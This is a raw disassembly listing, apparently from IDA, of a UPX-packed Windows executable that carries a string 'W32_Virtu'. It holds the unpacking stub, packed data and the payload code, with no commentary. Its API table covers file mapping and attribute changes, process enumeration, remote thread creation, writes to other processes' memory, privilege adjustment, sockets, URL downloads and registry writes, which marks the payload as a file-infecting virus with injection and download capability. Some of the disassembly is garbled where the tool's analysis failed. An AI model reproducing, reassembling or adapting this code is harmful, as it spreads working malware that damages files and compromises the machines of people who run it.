dd 30AF281Ch, 67107425h, 429EE153h, 0DF5C89BEh, 4003075h
dd 5B5CD75Eh, 5ABD075Ch, 1B615C08h, 4DEBB91Bh, 36072Eh
dd 30772E38h, 0C4CD9D1Bh, 0EC0049B6h, 3F00E843h, 873C807Ch
dd 8A26463h, 907B04DCh, 1640B6FFh, 0DEDE00FFh, 16000E00h
dd 2602019Fh, 90984DFh, 3192840h, 0BEE1A360h, 0D96C8B11h
dd 1470D374h, 9BD65DF2h, 256B9C2Ah, 0B6D9EC0Eh, 480E109Fh
dd 0E7541B04h, 13EBAEB6h, 63265A54h, 0C75C2259h, 0FF9A41CBh
dd 876545DCh, 30B0005h, 0FFFF4810h, 10B8EF62h, 50B0EB8h
dd 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F63FF0BEh, 0F52ED94Fh
dd 8A885D5Fh, 11C91CEBh, 2B3CE89Fh, 3E604810h, 0D1CBD917h
dd 60A3F40Ch, 1E400CA0h, 0CA04AF2h, 9DFF0CB1h, 0A000191Ch
dd 40880Ch, 3EC0009h, 7C93C23Dh, 14950007h, 707C4F40h
dd 6452F640h, 700BF83h, 0E13C1343h, 8578447Fh, 5BAB0013h
dd 1013E9A6h, 4E78CF8h, 0FEFF2FF2h, 1860230Eh, 0BE406A2Ch
dd 0E9F28408h, 4388E93Eh, 0FFEE10B9h, 3010B801h, 0C793C9Bh
dd 70DAD20h, 0F90AF2CFh, 18D80F7Fh, 0C8847001h, 0F92BC87h
dd 0F950F84h, 7E4F2600h, 847F0203h, 6F0F6C0Fh, 0C3C255h
dd 436FA89Ah, 6446049Fh, 6E691F13h, 536D5058h, 5020E560h
dd 44460072h
dd 4227E401h, 6B32399Eh, 7515123Ch, 4206BD02h, 53419Eh
dd 57FF941Ch, 0EB01910Eh, 5C5CC606h, 695C7325h, 0FFFCBA70h
dd 662463CDh, 71CEC81h, 5300E4FFh, 62654465h, 76696775h
dd 9A8C7D1Bh, 41A76785h, 61756A64h, 4CDB7254h, 656B6FF6h
dd 4C73176Eh, 7075126Fh, 4FEEDFB6h, 756C6156h, 4F174165h
dd 636F2870h, 752C7324h, 34C6A4h, 3F617643h, 0A951B233h
dd 4C79E318h, 168DFC6Dh, 11651E88h, 6172545Fh, 96DA5779h
dd 17354AEAh, 1A613143h, 0DDCEA952h, 56F6896h, 140C6854h
dd 0B5BA7356h, 58DB51ADh, 454F2841h, 0B6B3D278h, 6E3A7799h
dd 0F3F54735h, 344B891Eh, 545448FAh, 203C7F50h, 0A95A5732h
dd 4F207EF7h, 10A0D4Bh, 0B3449F4Bh, 2DDB56Fh, 67044C2Dh
dd 25203A2Dh, 3DAD1875h, 282F652Ch, 26B57954h, 6D5B5336h
dd 638670A3h, 0F72F1583h, 2AD4754h, 72932DC7h, 58C5A1C9h
dd 47579F2Bh, 0A3DD2B00h, 0F6F451ADh, 73CBE564h, 2BFDA165h
dd 76736D8Dh, 77CBA963h, 0A9C5BBEEh, 3203F169h, 0E775175Fh
dd 6CD34DBDh, 34353603h, 6EBB6933h, 7CE9A69h, 30313203h
dd 0C8322B39h, 38CEE7h, 343507E5h, 0C8320C8h, 26313233h
dd 30320EA4h, 3ADB7837h, 0A56B3FFEh, 53A3C1B4h, 5754464Fh
dd 5C455241h, 0B160694Dh, 6FE9556Dh, 0C3A75CBFh, 5CFDD6DDh
dd 72727543h, 73C456FDh, 75525CF2h, 0ED0C3ACh, 0E455C48Bh
dd 0F64D1B8Fh, 6E67BFB6h, 6A726473h, 0E2652379h, 12D85300h
dd 0E649CAF6h, 0AD6C0E57h, 2D60A15Ch, 0E357467Fh, 0CDC03770h
dd 20534449h, 20672E43h, 0B7B3F576h, 760BEB95h, 9D325048h
dd 0DB25EC63h, 105320DCh, 1A1B6544h, 96E66F87h, 12172385h
dd 0E3634683h, 407379C7h, 20334200h, 71AD318Fh, 1323B58Bh
dd 48206D1Bh, 0B0180506h, 44378242h, 0B773D9B0h, 66DE208Dh
dd 9C6D672Fh, 0FED6632Ah, 63242D85h, 7974690Ah, 6E614D20h
dd 404D1A1Eh, 0D22276h, 0E306DBC4h, 0EC408B74h, 0C65B446h
dd 0C65B6370h, 53470DF9h, 0E9B66F4Dh, 65871BA6h, 614E6B46h
dd 6C01686Dh, 35C177DFh, 956372E0h, 79705F0Ah, 0C96E4919h
dd 28D10AB9h, 0DA4E3265h, 81A5D346h, 70676C6Fh, 41D8538Ch
dd 8A8D856Ah, 9C192768h, 6B42BA99h, 0FD33212h, 0B0188F54h
dd 2C35AE60h, 1E4E2118h, 885B05B6h, 41616974h, 0B6764554h
dd 3F19F0B0h, 4632616Bh, 0E63C5363h, 67DBDAE8h, 6A624F7Bh
dd 1442C76h, 0C3317322h, 0B548DB0h, 0DEF6C83Ah, 48DB42C2h
dd 470C645Eh, 0DB61DE24h, 6E085E4Bh, 355A61D2h, 0F0E09C74h
dd 635244C7h, 0B63679C8h, 0E4149856h, 4E492B1Fh, 76C3866Fh
dd 9530FEBh, 49067065h, 0CD9326CCh, 641C5B82h, 6EB32845h
dd 6630592Eh, 12E0E836h, 7AD1AC47h, 0FD8DA0Bh, 0AF66C13Bh
dd 62694CF1h, 2BB5671Ah, 0B5CD5808h, 137C824Dh, 59B3DAD5h
dd 63CF8E40h, 74816954h, 8816D61Dh, 4DDE6575h, 0D9B278E9h
dd 0D23424ACh, 8B305D0Dh, 39C45ED0h, 9B09624Fh, 455A8795h
dd 0B8DF3178h, 0A6A56B1h, 522D906Ah, 0E785D91Bh, 87B5926h
dd 38657A86h, 0B03885B5h, 45154CA7h, 64DF67FCh, 0D16FC3A3h
dd 4BA1673Ah, 0E773808Bh, 10457965h, 970FC186h, 510ED6B0h
dd 9E11F60Ah, 0B0109B16h, 1021E730h, 61DEDDA1h, 410C51E0h
dd 34BE6E62h, 0E4040A15h, 0A6E6104h, 62205B3h, 36777463h
dd 3582FB6Ch, 440A1089h, 5A0E6112h, 8AD7F6C7h, 0CA796669h
dd 2B758F67h, 0C3686DECh, 6FCE6C36h, 11112C79h, 6F2DECEEh
dd 0FF8F5210h, 0EA071ECh, 4114B4D0h, 69757163h, 0B0E95C72h
dd 35494D21h, 0B34F86A0h, 0DE133AE0h, 0CA7273ECh, 6DA39C31h
dd 35B26D06h, 33B4920Eh, 530F62D7h, 445F1D4Dh, 2B70E066h
dd 685F3F58h, 8527F9F6h, 22E6236h, 0AE727907h, 9C53572Ch
dd 5946C4E9h, 69A0395Dh, 65271DC6h, 0C5984C0Eh, 0A141586h
dd 0DCB615E7h, 6649B420h, 62057090h, 0B1BB669Ch, 0F44F4166h
dd 6D850424h, 855A0E0Fh, 11419B55h, 0B01484B0h, 6E14670Eh
dd 6BDC1A98h, 43496E03h, 32507453h, 1A811996h, 50D6CB47h
dd 6A3C0D8Ch, 0D020273h, 2CB2CB2Ch, 346F3901h, 0CB2CB217h
dd 4090CB2h, 1D5B1013h, 3616CAA4h, 4C964550h, 378B0FF3h
dd 40D47E4Dh, 0F00E069h, 0B0010B01h, 26403A33h, 0B2306B8h
dd 588AD7D1h, 20B0725h, 96CDECB7h, 0C50074Ah, 0B037811Eh
dd 7103433h, 84069B06h, 2D042F2Ch, 85718B8Ch, 17C64EDh
dd 0E26A2E1Eh, 0AC1A9230h, 17269024h, 4DE3DB90h, 2EE0049Fh
dd 0E4FBE164h, 616EBF0Fh, 272A2B5Fh, 0C04C016h, 0CC00002Fh
dd 9C33612h, 0FF000000h, 0
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_30905000
lea edi, [esi-4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_30906B32
; ---------------------------------------------------------------------------
align 8
loc_30906B28: ; CODE XREF: UPX1:loc_30906B39�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_30906B2E: ; CODE XREF: UPX1:30906BC6�j
; UPX1:30906BDD�j
add ebx, ebx
jnz short loc_30906B39
loc_30906B32: ; CODE XREF: UPX1:30906B20�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B39: ; CODE XREF: UPX1:30906B30�j
jb short loc_30906B28
mov eax, 1
loc_30906B40: ; CODE XREF: UPX1:30906B4F�j
; UPX1:30906B5A�j
add ebx, ebx
jnz short loc_30906B4B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B4B: ; CODE XREF: UPX1:30906B42�j
adc eax, eax
add ebx, ebx
jnb short loc_30906B40
jnz short loc_30906B5C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_30906B40
loc_30906B5C: ; CODE XREF: UPX1:30906B51�j
xor ecx, ecx
sub eax, 3
jb short loc_30906B70
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_30906BE2
mov ebp, eax
loc_30906B70: ; CODE XREF: UPX1:30906B61�j
add ebx, ebx
jnz short loc_30906B7B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B7B: ; CODE XREF: UPX1:30906B72�j
adc ecx, ecx
add ebx, ebx
jnz short loc_30906B88
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B88: ; CODE XREF: UPX1:30906B7F�j
adc ecx, ecx
jnz short loc_30906BAC
inc ecx
loc_30906B8D: ; CODE XREF: UPX1:30906B9C�j
; UPX1:30906BA7�j
add ebx, ebx
jnz short loc_30906B98
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B98: ; CODE XREF: UPX1:30906B8F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_30906B8D
jnz short loc_30906BA9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_30906B8D
loc_30906BA9: ; CODE XREF: UPX1:30906B9E�j
add ecx, 2
loc_30906BAC: ; CODE XREF: UPX1:30906B8A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_30906BCC
loc_30906BBD: ; CODE XREF: UPX1:30906BC4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_30906BBD
jmp loc_30906B2E
; ---------------------------------------------------------------------------
align 4
loc_30906BCC: ; CODE XREF: UPX1:30906BBB�j
; UPX1:30906BD9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_30906BCC
add edi, ecx
jmp loc_30906B2E
; ---------------------------------------------------------------------------
loc_30906BE2: ; CODE XREF: UPX1:30906B6C�j
pop esi
mov edi, esi
mov ecx, 8Ch
loc_30906BEA: ; CODE XREF: UPX1:30906BF1�j
; UPX1:30906BF6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_30906BEF: ; CODE XREF: UPX1:30906C14�j
cmp al, 1
ja short loc_30906BEA
cmp byte ptr [edi], 1
jnz short loc_30906BEA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_30906BEF
lea edi, [esi+4000h]
loc_30906C1C: ; CODE XREF: UPX1:30906C3E�j
mov eax, [edi]
or eax, eax
jz short loc_30906C67
mov ebx, [edi+4]
lea eax, [eax+esi+6000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+608Ch]
xchg eax, ebp
loc_30906C39: ; CODE XREF: UPX1:30906C5F�j
mov al, [edi]
inc edi
or al, al
jz short loc_30906C1C
mov ecx, edi
jns short near ptr loc_30906C4A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_30906C4A: ; CODE XREF: UPX1:30906C42�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+6090h]
or eax, eax
jz short loc_30906C61
mov [ebx], eax
add ebx, 4
jmp short loc_30906C39
; ---------------------------------------------------------------------------
loc_30906C61: ; CODE XREF: UPX1:30906C58�j
call dword ptr [esi+6094h]
loc_30906C67: ; CODE XREF: UPX1:30906C20�j
popa
jmp loc_30902305
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00007000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00007000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 30907000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 70C4h, 708Ch, 3 dup(0)
dd 70D1h, 709Ch, 3 dup(0)
dd 70DEh, 70A4h, 3 dup(0)
dd 70E9h, 70ACh, 3 dup(0)
dd 70F4h, 70B4h, 3 dup(0)
dd 7100h, 70BCh, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
dd 77C3528Dh, 0
dd 77D4C96Ah, 0
dd 7620AFB6h, 0
dd 71AB1A6Dh, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
dd 408B0018h, 40B60F30h, 0F88302h, 0E83C75h, 5D000000h
dd 2320ED81h, 858B0040h, 402367h, 236F8503h, 0F08B0040h
dd 236B858Bh, 85030040h, 40236Fh, 33FE8B50h, 8532ACC9h
dd 402377h, 8D3B41AAh, 402373h, 2BC3EF7Ch, 30FF64C0h, 0B8208964h
dd 12345678h, 50000387h, 6B100000h, 0
db 90h
db 30h, 0, 1Eh
db 2 dup(0), 38h
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_C = dword ptr -0Ch
var_4 = dword ptr -4
call $+5
push ebp
mov ebx, [esp+8]
mov ebp, [esp+8+var_4]
sub [esp+8+var_4], 84h
and ebx, 0FFFFF000h
sub ebp, 401005h
loc_309072A1: ; CODE XREF: start+3D�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_309072B6
mov eax, [ebx+3Ch]
add eax, ebx
cmp word ptr [eax], 4550h
jz short loc_309072BE
loc_309072B6: ; CODE XREF: start+29�j
sub ebx, 100h
jmp short loc_309072A1
; ---------------------------------------------------------------------------
loc_309072BE: ; CODE XREF: start+35�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_309072CC: ; CODE XREF: start:loc_309072F3�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_309072F3
cmp dword ptr [eax+3], 636F7250h
jnz short loc_309072F3
cmp dword ptr [eax+7], 72646441h
jnz short loc_309072F3
cmp dword ptr [eax+0Bh], 737365h
jz short loc_309072F8
loc_309072F3: ; CODE XREF: start+57�j start+60�j ...
loop loc_309072CC
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_309072F8: ; CODE XREF: start+72�j
sub [esp+0Ch+var_C], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_3090731E+2
inc ebx
insb
outsd
jnb short near ptr loc_3090737C+2
dec eax
popa
outsb
db 64h
insb
loc_3090731E: ; CODE XREF: start+90�p
add gs:[ebx-1], dl
start endp ; sp-analysis failed
setalc
mov [ebp+402407h], eax
call near ptr loc_3090733A+1
inc ebx
jb short loc_30907396
popa
jz short loc_30907399
inc ebp
jbe short near ptr loc_3090739B+1
outsb
jz short near ptr loc_30907379+2
loc_3090733A: ; CODE XREF: UPX2:30907329�p
add [ebx-1], dl
setalc
mov [ebp+40240Bh], eax
call sub_30907356
inc edi
db 65h
jz short loc_30907399
popa
jnb short sub_309073C4
inc ebp
jb short near ptr sub_309073C4+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_30907356 proc near ; CODE XREF: UPX2:30907344�p
; FUNCTION CHUNK AT 309073D4 SIZE 0000008D BYTES
; FUNCTION CHUNK AT 309074F0 SIZE 000000DD BYTES
push ebx
call esi ; lstrcat
mov [ebp+40240Fh], eax
call sub_309073A9
test eax, eax
jz short loc_30907389
push eax
call dword ptr [ebp+40240Fh]
test eax, eax
jnz short loc_30907383
lea eax, [ebp+401155h]
loc_30907379: ; CODE XREF: UPX2:30907338�j
mov dl, [eax-1]
loc_3090737C: ; CODE XREF: start+98�j
call sub_309073C4
jmp short loc_309073D4
; ---------------------------------------------------------------------------
loc_30907383: ; CODE XREF: sub_30907356+1B�j
; sub_30907356+E7�j ...
call dword ptr [ebp+402407h]
loc_30907389: ; CODE XREF: sub_30907356+10�j
pop ebp
retn
sub_30907356 endp
; ---------------------------------------------------------------------------
loc_3090738B: ; CODE XREF: sub_309073A9+2�p
; sub_30907356:loc_30907560�p
pop edx
push 0
push 0
push 0
push 0
; ---------------------------------------------------------------------------
db 68h, 1
; ---------------------------------------------------------------------------
loc_30907396: ; CODE XREF: UPX2:3090732F�j
add [eax+eax], al
loc_30907399: ; CODE XREF: UPX2:30907332�j
; UPX2:3090734A�j
mov eax, esp
loc_3090739B: ; CODE XREF: UPX2:30907335�j
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
push esi
push esp
pop edi
xor eax, [eax]
; =============== S U B R O U T I N E =======================================
sub_309073A9 proc near ; CODE XREF: sub_30907356+9�p
xor ecx, ecx
call loc_3090738B
lea edx, [ebp+401125h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+40240Bh]
add esp, 20h
retn
sub_309073A9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_309073C4 proc near ; CODE XREF: UPX2:3090734E�j
; sub_30907356:loc_3090737C�p ...
mov dh, dl
mov ecx, 12B2h
loc_309073CB: ; CODE XREF: sub_309073C4+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_309073CB
retn
sub_309073C4 endp
; ---------------------------------------------------------------------------
db 0E6h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_30907356
loc_309073D4: ; CODE XREF: sub_30907356+2B�j
and dword ptr [ebp+401480h], 0
and dword ptr [ebp+401484h], 0
and dword ptr [ebp+401488h], 0
push edi
mov byte ptr [ebp+401262h], 1
mov [ebp+402413h], esi
lea esi, [ebp+4014A9h]
xor ecx, ecx
lea edi, [ebp+402423h]
mov cl, 1Ch
call sub_3090770B
pop edi
call dword ptr [ebp+40245Bh]
shr eax, 1Fh
jz loc_309074F0
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+40241Bh], eax
push 5839h
push 0
call dword ptr [ebp+40248Bh]
test eax, eax
jz loc_30907383
xchg eax, edi
lea esi, [ebp+401000h]
mov ebp, edi
mov ecx, 60Fh
sub ebp, 401000h
lea edx, [ebp+4011E2h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_30907356
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+4018D1h]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+40241Bh]
add esp, 20h
test eax, eax
jz loc_30907383
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+40241Bh]
test eax, eax
jz loc_30907383
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+40241Bh]
push 1000Ah
call dword ptr [ebp+40241Bh]
call sub_309074E0
jmp loc_30907383
; =============== S U B R O U T I N E =======================================
sub_309074E0 proc near ; CODE XREF: UPX2:309074D6�p
; sub_309074E0+D�j
push 1
pop ecx
jecxz short locret_309074EF
push 0Ah
call dword ptr [ebp+402483h]
jmp short sub_309074E0
; ---------------------------------------------------------------------------
locret_309074EF: ; CODE XREF: sub_309074E0+3�j
retn
sub_309074E0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_30907356
loc_309074F0: ; CODE XREF: sub_30907356+C0�j
cmp dword ptr [ebp+40243Bh], 0
jz loc_30907383
call near ptr loc_30907507+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_30907507: ; CODE XREF: sub_30907356+1A7�p
add bh, bh
xchg eax, ebp
dec edi
and al, 40h
add [ebp+401637B5h], cl
add [ebx], dh
leave
lea edi, [ebp+402493h]
mov cl, 9
xchg eax, ebx
call sub_3090770B
cmp dword ptr [ebp+4024B3h], 0
jz loc_30907383
mov eax, [ebp+402497h]
push dword ptr [eax+1]
pop dword ptr [ebp+4023C1h]
mov eax, [ebp+40249Bh]
push dword ptr [eax+1]
pop dword ptr [ebp+4023C7h]
mov ecx, [ebp+40249Fh]
jecxz short loc_30907560
push dword ptr [ecx+1]
pop dword ptr [ebp+4023D4h]
loc_30907560: ; CODE XREF: sub_30907356+1FF�j
call loc_3090738B
lea edx, [ebp+40149Fh]
push edx
push 5839h
push 0
push 4
push eax
push 0FFFFFFFFh
call dword ptr [ebp+40242Bh]
add esp, 20h
push 5839h
mov edx, esp
push 0
mov ecx, esp
push 4
push 0
push 2
push edx
push 0
push 5839h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4024A3h]
pop edi
pop ecx
test edi, edi
jz loc_30907383
lea esi, [ebp+401000h]
mov ecx, 60Fh
mov ebp, edi
rep movsd
sub ebp, 401000h
lea eax, [ebp+40134Eh]
jmp eax
; END OF FUNCTION CHUNK FOR sub_30907356
; ---------------------------------------------------------------------------
db 8Dh, 95h, 89h
db 17h
db 40h, 0, 52h
db 0FFh
db 95h, 63h, 24h
db 40h ; @
align 2
dw 16E8h
db 0
db 2 dup(0), 4Ch
aOokupprivilege db 'ookupPrivilegeValueA',0
db 50h, 0FFh, 95h
dd 402413h, 24178589h, 54500040h, 0FF6A206Ah, 24A795FFh
dd 0C0850040h, 963F755Fh, 5656026Ah, 16AD48Bh, 11E852h
dd 65530000h, 75626544h, 69725067h, 656C6976h, 56006567h
dd 241795FFh, 0C48B0040h, 50565656h, 95FF5756h, 402493h
dd 5710C483h, 240795FFh, 6A0040h, 95FF026Ah, 40243Bh, 128B9h
dd 0E12B9700h, 54240C89h, 7395FF57h, 33004024h, 0F7A583F6h
dd 4024h, 95FF5754h, 402477h, 5C74C085h, 4FE8346h, 74FFEE72h
dd 6A0824h, 95FF2A6Ah, 40246Fh, 0DC74C085h, 3E4E893h, 0C9330000h
dd 3930E391h, 4024F785h, 81287500h, 0C3EC1h, 50545000h
dd 50505156h, 3395FF53h, 85004024h, 0F7459C0h, 82474FFh
dd 24F7858Fh, 9E80040h, 53FFFFFEh, 240795FFh, 98EB0040h
dd 128C481h, 0FF570000h, 40240795h, 0FC91E900h, 5890FFFFh
dd 39005858h, 0F4000018h, 0Bh, 2 dup(0)
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_3090770B proc near ; CODE XREF: sub_30907356+B1�p
; sub_30907356+1C9�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+402413h]
stosd
pop ecx
loc_30907716: ; CODE XREF: sub_3090770B+E�j
lodsb
test al, al
jnz short loc_30907716
loop sub_3090770B
retn
sub_3090770B endp
; ---------------------------------------------------------------------------
aW32_virtu db 'W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_30907A4F proc near ; CODE XREF: sub_30907A86+6C�p
; sub_30907A86+7D�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4024ABh]
add esp, 0Ch
call dword ptr [ebp+4024AFh]
add esp, 8
retn
sub_30907A4F endp
; =============== S U B R O U T I N E =======================================
sub_30907A86 proc near ; CODE XREF: UPX2:3090867D�p
push edi
lea eax, [ebp+40149Fh]
xor edi, edi
push eax
push 0
push 6
call dword ptr [ebp+40246Bh]
test eax, eax
jz short loc_30907B1D
push eax
push 5839h
mov edx, esp
push 0
mov ecx, esp
push 4
push 100000h
push 2
push edx
push 0
push 5839h
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4024A3h]
pop edi
pop ecx
call dword ptr [ebp+402407h]
test edi, edi
jz short loc_30907B1D
mov ecx, [ebp+401488h]
jecxz short loc_30907AE6
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_30907AE6: ; CODE XREF: sub_30907A86+52�j
mov eax, [ebp+402497h]
lea ecx, [edi+1379h]
call sub_30907A4F
mov eax, [ebp+40249Bh]
lea ecx, [edi+13C6h]
call sub_30907A4F
mov eax, [ebp+40249Fh]
test eax, eax
jz short loc_30907B1D
lea ecx, [edi+13D3h]
call sub_30907A4F
loc_30907B1D: ; CODE XREF: sub_30907A86+16�j
; sub_30907A86+4A�j ...
mov eax, edi
pop edi
retn
sub_30907A86 endp
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 4018A8h
xor ecx, ecx
lea eax, [ebp+401C3Eh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+402437h]
xchg eax, [esp]
call dword ptr [ebp+402407h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 4018D7EDh, 8DFF6A00h, 4018A295h
dd 0CD525000h, 2A002420h, 0CC48300h, 0E885C766h, 0CD004018h
dd 0EA85C720h, 24004018h, 5D002A00h, 6A016AC3h, 0FF33FF01h
dd 15FF0473h, 0F074C085h, 0B68h, 5BD08B00h, 8D3C5003h
dd 401906B5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C783C2EBh, 0D48B570Fh
dd 50CC8B53h, 51406A54h, 0FFFF6A52h, 4024AB95h, 0CC48300h
dd 243F958Bh, 0D72B0040h, 0C707EA83h, 0E8006A07h, 3578900h
dd 19569C3h, 5004025h, 33080884h, 1AB042C0h, 25019589h
dd 0E2F70040h, 0AA61428Dh, 0E175C9FEh, 0E855C3h, 5D000000h
dd 1998ED81h, 9D8B0040h, 402505h, 8247C83h, 0B9840F00h
dd 81000000h, 208ECh, 4685400h, 0FF000001h, 40245795h
dd 8DFC8B00h, 1042484h, 6A500000h, 4E800h, 52560000h, 0FF570054h
dd 40245395h, 8DC93300h, 10497h, 6A515100h, 16A5102h, 68h
dd 95FF5240h, 402427h, 74F68596h, 6854505Bh, 104h, 24B4FF57h
dd 220h, 24E395FFh, 85590040h, 0E31674C0h, 0D48B5014h
dd 5152006Ah, 95FF5657h, 40248Fh, 75C08559h, 95FF56D0h
dd 402407h, 5244578Dh, 58446A57h, 104978Dh, 33AB0000h
